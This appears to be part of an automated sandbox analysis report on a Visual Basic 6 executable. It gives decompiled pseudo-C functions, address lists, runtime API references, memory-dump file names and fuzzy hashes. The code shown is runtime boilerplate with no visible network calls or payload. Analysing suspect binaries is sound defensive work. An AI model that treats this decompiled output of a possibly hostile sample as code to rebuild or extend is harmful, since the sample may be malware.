				char* _t52;
				signed int _t55;
				intOrPtr _t70;

				_push(0x401576);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t70;
				_push(0x24);
				L00401570();
				_v12 = _t70;
				_v8 = 0x4013b0;
				if( *0x430010 != 0) {
					_v44 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v44 = 0x430010;
				}
				_t45 =  &_v28;
				L00401762();
				_v32 = _t45;
				_t48 =  *((intOrPtr*)( *_v32 + 0x1c8))(_v32, _t45,  *((intOrPtr*)( *((intOrPtr*)( *_v44)) + 0x3c0))( *_v44));
				asm("fclex");
				_v36 = _t48;
				if(_v36 >= 0) {
					_v48 = _v48 & 0x00000000;
				} else {
					_push(0x1c8);
					_push(0x403e40);
					_push(_v32);
					_push(_v36);
					L00401756();
					_v48 = _t48;
				}
				L00401750();
				if( *0x430010 != 0) {
					_v52 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v52 = 0x430010;
				}
				_t52 =  &_v28;
				L00401762();
				_v32 = _t52;
				_t55 =  *((intOrPtr*)( *_v32 + 0x1d8))(_v32, _t52,  *((intOrPtr*)( *((intOrPtr*)( *_v52)) + 0x338))( *_v52));
				asm("fclex");
				_v36 = _t55;
				if(_v36 >= 0) {
					_v56 = _v56 & 0x00000000;
				} else {
					_push(0x1d8);
					_push(0x403e40);
					_push(_v32);
					_push(_v36);
					L00401756();
					_v56 = _t55;
				}
				L00401750();
				_v24 = 0x143299;
				_push(0x4204fd);
				return _t55;
			}

0x004203af
0x004203ba
0x004203bb
0x004203c2
0x004203c5
0x004203cd
0x004203d0
0x004203de
0x004203f8
0x004203e0
0x004203e0
0x004203e5
0x004203ea
0x004203ef
0x004203ef
0x00420413
0x00420417
0x0042041c
0x00420427
0x0042042d
0x0042042f
0x00420436
0x00420452
0x00420438
0x00420438
0x0042043d
0x00420442
0x00420445
0x00420448
0x0042044d
0x0042044d
0x00420459
0x00420465
0x0042047f
0x00420467
0x00420467
0x0042046c
0x00420471
0x00420476
0x00420476
0x0042049a
0x0042049e
0x004204a3
0x004204ae
0x004204b4
0x004204b6
0x004204bd
0x004204d9
0x004204bf
0x004204bf
0x004204c4
0x004204c9
0x004204cc
0x004204cf
0x004204d4
0x004204d4
0x004204e0
0x004204e5
0x004204ec
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 004203C5
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,00401576), ref: 004203EA
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00401576), ref: 00420417
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001C8,?,?,?,?,?,?,?,00401576), ref: 00420448
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00401576), ref: 00420459
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,?,?,?,00401576), ref: 00420471
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,00401576), ref: 0042049E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001D8,?,?,?,?,?,?,?,?,?,00401576), ref: 004204CF
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00401576), ref: 004204E0

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresultNew2$Chkstk
String ID:
API String ID: 3581712425-0
Opcode ID: d0c00feca4891d5afc3e0d36c6e2661f3d905adaf57d82ced964ad8d6f544344
Instruction ID: 02cb1d260c0ce319cbb19b89edabcdfd8d5493c60633405797e54199fc29265e
Opcode Fuzzy Hash: d0c00feca4891d5afc3e0d36c6e2661f3d905adaf57d82ced964ad8d6f544344
Instruction Fuzzy Hash: C9410874E40218EFCB04EFA1D949BEEBBB4BB08704F10452AF111B72A1C7B85941DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00427590, Relevance: 10.6, APIs: 7, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00427590(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a40) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				void* _v32;
				char _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr* _v56;
				signed int _v60;
				char* _t37;
				signed int _t40;
				void* _t51;
				void* _t53;
				intOrPtr _t54;

				_t54 = _t53 - 0xc;
				 *[fs:0x0] = _t54;
				L00401570();
				_v16 = _t54;
				_v12 = 0x4014c0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x24,  *[fs:0x0], 0x401576, _t51);
				L0040173E();
				if( *0x430010 != 0) {
					_v56 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v56 = 0x430010;
				}
				_t37 =  &_v36;
				L00401762();
				_v40 = _t37;
				_t40 =  *((intOrPtr*)( *_v40 + 0x1c4))(_v40, _t37,  *((intOrPtr*)( *((intOrPtr*)( *_v56)) + 0x334))( *_v56));
				asm("fclex");
				_v44 = _t40;
				if(_v44 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x1c4);
					_push(0x403e40);
					_push(_v40);
					_push(_v44);
					L00401756();
					_v60 = _t40;
				}
				L00401750();
				_v28 = 0x769b93;
				_push(0x427682);
				L00401720();
				return _t40;
			}

0x00427593
0x004275a2
0x004275ac
0x004275b4
0x004275b7
0x004275be
0x004275cd
0x004275d6
0x004275e2
0x004275fc
0x004275e4
0x004275e4
0x004275e9
0x004275ee
0x004275f3
0x004275f3
0x00427617
0x0042761b
0x00427620
0x0042762b
0x00427631
0x00427633
0x0042763a
0x00427656
0x0042763c
0x0042763c
0x00427641
0x00427646
0x00427649
0x0042764c
0x00427651
0x00427651
0x0042765d
0x00427662
0x00427669
0x0042767c
0x00427681

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 004275AC
__vbaStrCopy.MSVBVM60(?,?,?,?,00401576), ref: 004275D6
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,00401576), ref: 004275EE
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042761B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001C4), ref: 0042764C
__vbaFreeObj.MSVBVM60 ref: 0042765D
__vbaFreeStr.MSVBVM60(00427682), ref: 0042767C

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckChkstkCopyHresultNew2
String ID:
API String ID: 2810356740-0
Opcode ID: 397f47d4b6ab2cbcaeae9593c650c84d735254c7559e00be0004948c0de69f76
Instruction ID: aa7dbe5ea23fe903069e6893c91cd5b06cc063fe4ed72f531fd94529aa79ad54
Opcode Fuzzy Hash: 397f47d4b6ab2cbcaeae9593c650c84d735254c7559e00be0004948c0de69f76
Instruction Fuzzy Hash: A0212874901208EFCB04EFA5E995BDEBBB5FB08754F20406AF005BB2A0C7B95A44DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041EF1B, Relevance: 9.1, APIs: 6, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0041EF1B(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr* _v64;
				signed int _v68;
				char* _t30;
				signed int _t34;
				intOrPtr _t47;

				_push(0x401576);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t47;
				_push(0x30);
				L00401570();
				_v12 = _t47;
				_v8 = 0x401348;
				if( *0x430010 != 0) {
					_v64 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v64 = 0x430010;
				}
				_t30 =  &_v32;
				L00401762();
				_v52 = _t30;
				_v40 = 0x80020004;
				_v48 = 0xa;
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t34 =  *((intOrPtr*)( *_v52 + 0x1cc))(_v52, 0x10, _t30,  *((intOrPtr*)( *((intOrPtr*)( *_v64)) + 0x4a0))( *_v64));
				asm("fclex");
				_v56 = _t34;
				if(_v56 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0x1cc);
					_push(0x403e40);
					_push(_v52);
					_push(_v56);
					L00401756();
					_v68 = _t34;
				}
				L00401750();
				_v28 =  *0x401340;
				asm("wait");
				_push(0x41f009);
				return _t34;
			}

0x0041ef20
0x0041ef2b
0x0041ef2c
0x0041ef33
0x0041ef36
0x0041ef3e
0x0041ef41
0x0041ef4f
0x0041ef69
0x0041ef51
0x0041ef51
0x0041ef56
0x0041ef5b
0x0041ef60
0x0041ef60
0x0041ef84
0x0041ef88
0x0041ef8d
0x0041ef90
0x0041ef97
0x0041efa1
0x0041efab
0x0041efac
0x0041efad
0x0041efae
0x0041efb7
0x0041efbd
0x0041efbf
0x0041efc6
0x0041efe2
0x0041efc8
0x0041efc8
0x0041efcd
0x0041efd2
0x0041efd5
0x0041efd8
0x0041efdd
0x0041efdd
0x0041efe9
0x0041eff4
0x0041eff7
0x0041eff8
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 0041EF36
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,00401576), ref: 0041EF5B
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401576), ref: 0041EF88
__vbaChkstk.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401576), ref: 0041EFA1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001CC), ref: 0041EFD8
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401576), ref: 0041EFE9

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$CheckFreeHresultNew2
String ID:
API String ID: 3189907775-0
Opcode ID: 2b10a636c913b6b22890669fe8c3ac666a3529c9ccb42c24f69768795d0dbda8
Instruction ID: a275ed33c57db99b48b40c7e5e58ef47741a2e8d08f387a7b1fe62dbc0d2fe0a
Opcode Fuzzy Hash: 2b10a636c913b6b22890669fe8c3ac666a3529c9ccb42c24f69768795d0dbda8
Instruction Fuzzy Hash: 74211774D01608EBDB04EFA1E946B9EBBB5BF09704F10442AF5116B2A1C7B958418B58

Uniqueness

Uniqueness Score: -1.00%

Function 00420518, Relevance: 9.1, APIs: 6, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00420518(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr* _v64;
				signed int _v68;
				char* _t30;
				signed int _t34;
				intOrPtr _t47;

				_push(0x401576);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t47;
				_push(0x30);
				L00401570();
				_v12 = _t47;
				_v8 = 0x4013c8;
				if( *0x430010 != 0) {
					_v64 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v64 = 0x430010;
				}
				_t30 =  &_v32;
				L00401762();
				_v52 = _t30;
				_v40 = 0x80020004;
				_v48 = 0xa;
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t34 =  *((intOrPtr*)( *_v52 + 0x1cc))(_v52, 0x10, _t30,  *((intOrPtr*)( *((intOrPtr*)( *_v64)) + 0x394))( *_v64));
				asm("fclex");
				_v56 = _t34;
				if(_v56 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0x1cc);
					_push(0x403e40);
					_push(_v52);
					_push(_v56);
					L00401756();
					_v68 = _t34;
				}
				L00401750();
				_v28 =  *0x4013c0;
				asm("wait");
				_push(0x420606);
				return _t34;
			}

0x0042051d
0x00420528
0x00420529
0x00420530
0x00420533
0x0042053b
0x0042053e
0x0042054c
0x00420566
0x0042054e
0x0042054e
0x00420553
0x00420558
0x0042055d
0x0042055d
0x00420581
0x00420585
0x0042058a
0x0042058d
0x00420594
0x0042059e
0x004205a8
0x004205a9
0x004205aa
0x004205ab
0x004205b4
0x004205ba
0x004205bc
0x004205c3
0x004205df
0x004205c5
0x004205c5
0x004205ca
0x004205cf
0x004205d2
0x004205d5
0x004205da
0x004205da
0x004205e6
0x004205f1
0x004205f4
0x004205f5
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 00420533
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,00401576), ref: 00420558
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401576), ref: 00420585
__vbaChkstk.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401576), ref: 0042059E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001CC), ref: 004205D5
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401576), ref: 004205E6

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$CheckFreeHresultNew2
String ID:
API String ID: 3189907775-0
Opcode ID: d348cbea43818a17c7a08328ea4654ce099b495ea93d26e678420c947d672383
Instruction ID: f9ca2c07f277e04697ac811f9533ba699583443bb8b0bc7ecad966c50c2fde72
Opcode Fuzzy Hash: d348cbea43818a17c7a08328ea4654ce099b495ea93d26e678420c947d672383
Instruction Fuzzy Hash: 29212774D51618FBDB04EF91E946F9EBBB9BF09704F10442AF011BB2A1C7B95900CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00427E00, Relevance: 7.6, APIs: 5, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00427E00(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr* _v56;
				signed int _v60;
				char* _t35;
				signed int _t38;
				void* _t46;
				void* _t48;
				intOrPtr _t49;

				_t49 = _t48 - 0xc;
				 *[fs:0x0] = _t49;
				L00401570();
				_v16 = _t49;
				_v12 = 0x401518;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x24,  *[fs:0x0], 0x401576, _t46);
				if( *0x430010 != 0) {
					_v56 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v56 = 0x430010;
				}
				_t35 =  &_v36;
				L00401762();
				_v40 = _t35;
				_t38 =  *((intOrPtr*)( *_v40 + 0x1c4))(_v40, _t35,  *((intOrPtr*)( *((intOrPtr*)( *_v56)) + 0x4a0))( *_v56));
				asm("fclex");
				_v44 = _t38;
				if(_v44 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x1c4);
					_push(0x403e40);
					_push(_v40);
					_push(_v44);
					L00401756();
					_v60 = _t38;
				}
				L00401750();
				_v32 = 0xf030420;
				_v28 = 0x5b05;
				_push(0x427ee6);
				return _t38;
			}

0x00427e03
0x00427e12
0x00427e1c
0x00427e24
0x00427e27
0x00427e2e
0x00427e3d
0x00427e47
0x00427e61
0x00427e49
0x00427e49
0x00427e4e
0x00427e53
0x00427e58
0x00427e58
0x00427e7c
0x00427e80
0x00427e85
0x00427e90
0x00427e96
0x00427e98
0x00427e9f
0x00427ebb
0x00427ea1
0x00427ea1
0x00427ea6
0x00427eab
0x00427eae
0x00427eb1
0x00427eb6
0x00427eb6
0x00427ec2
0x00427ec7
0x00427ece
0x00427ed5
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 00427E1C
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,00401576), ref: 00427E53
__vbaObjSet.MSVBVM60(?,00000000), ref: 00427E80
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001C4), ref: 00427EB1
__vbaFreeObj.MSVBVM60 ref: 00427EC2

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckChkstkFreeHresultNew2
String ID:
API String ID: 4127847336-0
Opcode ID: a7a8c914ff1bf33a103dffe882b83e6ad91b9495489183531e351ed14db0135c
Instruction ID: 4ca406ed656db4bf07a631337f2ecf0950917f7dd76b6eb74e812525e31f688b
Opcode Fuzzy Hash: a7a8c914ff1bf33a103dffe882b83e6ad91b9495489183531e351ed14db0135c
Instruction Fuzzy Hash: 9B211B74901208EFCB00DF91D989B9DBBB5FB08714F60546AF001BB2A1C7B95D40CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041EE14, Relevance: 7.6, APIs: 5, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0041EE14(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				char _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr* _v52;
				signed int _v56;
				char* _t34;
				signed int _t37;
				void* _t45;
				void* _t47;
				intOrPtr _t48;

				_t48 = _t47 - 0xc;
				 *[fs:0x0] = _t48;
				L00401570();
				_v16 = _t48;
				_v12 = 0x401330;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x20,  *[fs:0x0], 0x401576, _t45);
				if( *0x430010 != 0) {
					_v52 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v52 = 0x430010;
				}
				_t34 =  &_v32;
				L00401762();
				_v36 = _t34;
				_t37 =  *((intOrPtr*)( *_v36 + 0x1d8))(_v36, _t34,  *((intOrPtr*)( *((intOrPtr*)( *_v52)) + 0x38c))( *_v52));
				asm("fclex");
				_v40 = _t37;
				if(_v40 >= 0) {
					_v56 = _v56 & 0x00000000;
				} else {
					_push(0x1d8);
					_push(0x403e40);
					_push(_v36);
					_push(_v40);
					L00401756();
					_v56 = _t37;
				}
				L00401750();
				_v28 = 0x1ed2;
				_push(0x41eef2);
				return _t37;
			}

0x0041ee17
0x0041ee26
0x0041ee30
0x0041ee38
0x0041ee3b
0x0041ee42
0x0041ee51
0x0041ee5b
0x0041ee75
0x0041ee5d
0x0041ee5d
0x0041ee62
0x0041ee67
0x0041ee6c
0x0041ee6c
0x0041ee90
0x0041ee94
0x0041ee99
0x0041eea4
0x0041eeaa
0x0041eeac
0x0041eeb3
0x0041eecf
0x0041eeb5
0x0041eeb5
0x0041eeba
0x0041eebf
0x0041eec2
0x0041eec5
0x0041eeca
0x0041eeca
0x0041eed6
0x0041eedb
0x0041eee1
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 0041EE30
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,00401576), ref: 0041EE67
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041EE94
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001D8), ref: 0041EEC5
__vbaFreeObj.MSVBVM60 ref: 0041EED6

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckChkstkFreeHresultNew2
String ID:
API String ID: 4127847336-0
Opcode ID: db5b0ffb2c4dcef7295f7a1e7294d2ddc3a277de6b2a2d4d413a4de2def42c85
Instruction ID: 69443f23277c272815352905970a6322407138d683bce906ba2c2dac3bac9eb1
Opcode Fuzzy Hash: db5b0ffb2c4dcef7295f7a1e7294d2ddc3a277de6b2a2d4d413a4de2def42c85
Instruction Fuzzy Hash: 5621F878900318AFCB04DFA6D949BDEBBB5BB08704F10406AF401BB2A1C7B959409B58

Uniqueness

Uniqueness Score: -1.00%

Function 00418DD1, Relevance: 7.6, APIs: 5, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00418DD1(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr* _v48;
				signed int _v52;
				char* _t33;
				signed int _t36;
				void* _t44;
				void* _t46;
				intOrPtr _t47;

				_t47 = _t46 - 0xc;
				 *[fs:0x0] = _t47;
				L00401570();
				_v16 = _t47;
				_v12 = 0x4012d0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x1c,  *[fs:0x0], 0x401576, _t44);
				if( *0x430010 != 0) {
					_v48 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v48 = 0x430010;
				}
				_t33 =  &_v28;
				L00401762();
				_v32 = _t33;
				_t36 =  *((intOrPtr*)( *_v32 + 0x1d8))(_v32, _t33,  *((intOrPtr*)( *((intOrPtr*)( *_v48)) + 0x33c))( *_v48));
				asm("fclex");
				_v36 = _t36;
				if(_v36 >= 0) {
					_v52 = _v52 & 0x00000000;
				} else {
					_push(0x1d8);
					_push(0x403e40);
					_push(_v32);
					_push(_v36);
					L00401756();
					_v52 = _t36;
				}
				L00401750();
				_push(0x418ea9);
				return _t36;
			}

0x00418dd4
0x00418de3
0x00418ded
0x00418df5
0x00418df8
0x00418dff
0x00418e0e
0x00418e18
0x00418e32
0x00418e1a
0x00418e1a
0x00418e1f
0x00418e24
0x00418e29
0x00418e29
0x00418e4d
0x00418e51
0x00418e56
0x00418e61
0x00418e67
0x00418e69
0x00418e70
0x00418e8c
0x00418e72
0x00418e72
0x00418e77
0x00418e7c
0x00418e7f
0x00418e82
0x00418e87
0x00418e87
0x00418e93
0x00418e98
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 00418DED
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,00401576), ref: 00418E24
__vbaObjSet.MSVBVM60(?,00000000), ref: 00418E51
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001D8), ref: 00418E82
__vbaFreeObj.MSVBVM60(00000000,?,00403E40,000001D8), ref: 00418E93

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckChkstkFreeHresultNew2
String ID:
API String ID: 4127847336-0
Opcode ID: ee84b07b65f9a365b408f8d39f199edaa75fce771a6a60e49ff3b0be86c9db55
Instruction ID: f292470fb42d082c7edb883b2aadc5a1e025a516294c4890dc16598e62487122
Opcode Fuzzy Hash: ee84b07b65f9a365b408f8d39f199edaa75fce771a6a60e49ff3b0be86c9db55
Instruction Fuzzy Hash: 83210474D40208EFCB00EFA5C949BDEBBB4BB08704F10816AF515BB2A1CBB85941DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00426DDB, Relevance: 7.6, APIs: 5, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00426DDB(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr* _v48;
				signed int _v52;
				char* _t33;
				signed int _t36;
				void* _t44;
				void* _t46;
				intOrPtr _t47;

				_t47 = _t46 - 0xc;
				 *[fs:0x0] = _t47;
				L00401570();
				_v16 = _t47;
				_v12 = 0x401450;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x1c,  *[fs:0x0], 0x401576, _t44);
				if( *0x430010 != 0) {
					_v48 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v48 = 0x430010;
				}
				_t33 =  &_v28;
				L00401762();
				_v32 = _t33;
				_t36 =  *((intOrPtr*)( *_v32 + 0x1d8))(_v32, _t33,  *((intOrPtr*)( *((intOrPtr*)( *_v48)) + 0x34c))( *_v48));
				asm("fclex");
				_v36 = _t36;
				if(_v36 >= 0) {
					_v52 = _v52 & 0x00000000;
				} else {
					_push(0x1d8);
					_push(0x403e40);
					_push(_v32);
					_push(_v36);
					L00401756();
					_v52 = _t36;
				}
				L00401750();
				_push(0x426eb3);
				return _t36;
			}

0x00426dde
0x00426ded
0x00426df7
0x00426dff
0x00426e02
0x00426e09
0x00426e18
0x00426e22
0x00426e3c
0x00426e24
0x00426e24
0x00426e29
0x00426e2e
0x00426e33
0x00426e33
0x00426e57
0x00426e5b
0x00426e60
0x00426e6b
0x00426e71
0x00426e73
0x00426e7a
0x00426e96
0x00426e7c
0x00426e7c
0x00426e81
0x00426e86
0x00426e89
0x00426e8c
0x00426e91
0x00426e91
0x00426e9d
0x00426ea2
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 00426DF7
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,?,?,00401576), ref: 00426E2E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00426E5B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,000001D8), ref: 00426E8C
__vbaFreeObj.MSVBVM60 ref: 00426E9D

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckChkstkFreeHresultNew2
String ID:
API String ID: 4127847336-0
Opcode ID: 8ef457f8d96da88ee62599f5182118412b58af64d1a637f3b357abaa02ea5deb
Instruction ID: fbc03a736273f030a1eb44aef34c94619c7d281fc704892b92ddcb32ebc48d3a
Opcode Fuzzy Hash: 8ef457f8d96da88ee62599f5182118412b58af64d1a637f3b357abaa02ea5deb
Instruction Fuzzy Hash: 7C211A78D00218EFCB04EFA5D945B9EBBB4BF08704F51812AF515BB2A1C7B85941DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004276A9, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E004276A9(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				char _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr* _v44;
				signed int _v48;
				char* _t27;
				signed int _t30;
				intOrPtr _t41;

				_push(0x401576);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t41;
				_push(0x1c);
				L00401570();
				_v12 = _t41;
				_v8 = 0x4014d0;
				if( *0x430010 != 0) {
					_v44 = 0x430010;
				} else {
					_push(0x430010);
					_push(0x40516c);
					L0040175C();
					_v44 = 0x430010;
				}
				_t27 =  &_v28;
				L00401762();
				_v32 = _t27;
				_t30 =  *((intOrPtr*)( *_v32 + 0x1d8))(_v32, _t27,  *((intOrPtr*)( *((intOrPtr*)( *_v44)) + 0x498))( *_v44));
				asm("fclex");
				_v36 = _t30;
				if(_v36 >= 0) {
					_v48 = _v48 & 0x00000000;
				} else {
					_push(0x1d8);
					_push(0x403e40);
					_push(_v32);
					_push(_v36);
					L00401756();
					_v48 = _t30;
				}
				L00401750();
				_v24 = 0x591d;
				_push(0x427774);
				return _t30;
			}

0x004276ae
0x004276b9
0x004276ba
0x004276c1
0x004276c4
0x004276cc
0x004276cf
0x004276dd
0x004276f7
0x004276df
0x004276df
0x004276e4
0x004276e9
0x004276ee
0x004276ee
0x00427712
0x00427716
0x0042771b
0x00427726
0x0042772c
0x0042772e
0x00427735
0x00427751
0x00427737
0x00427737
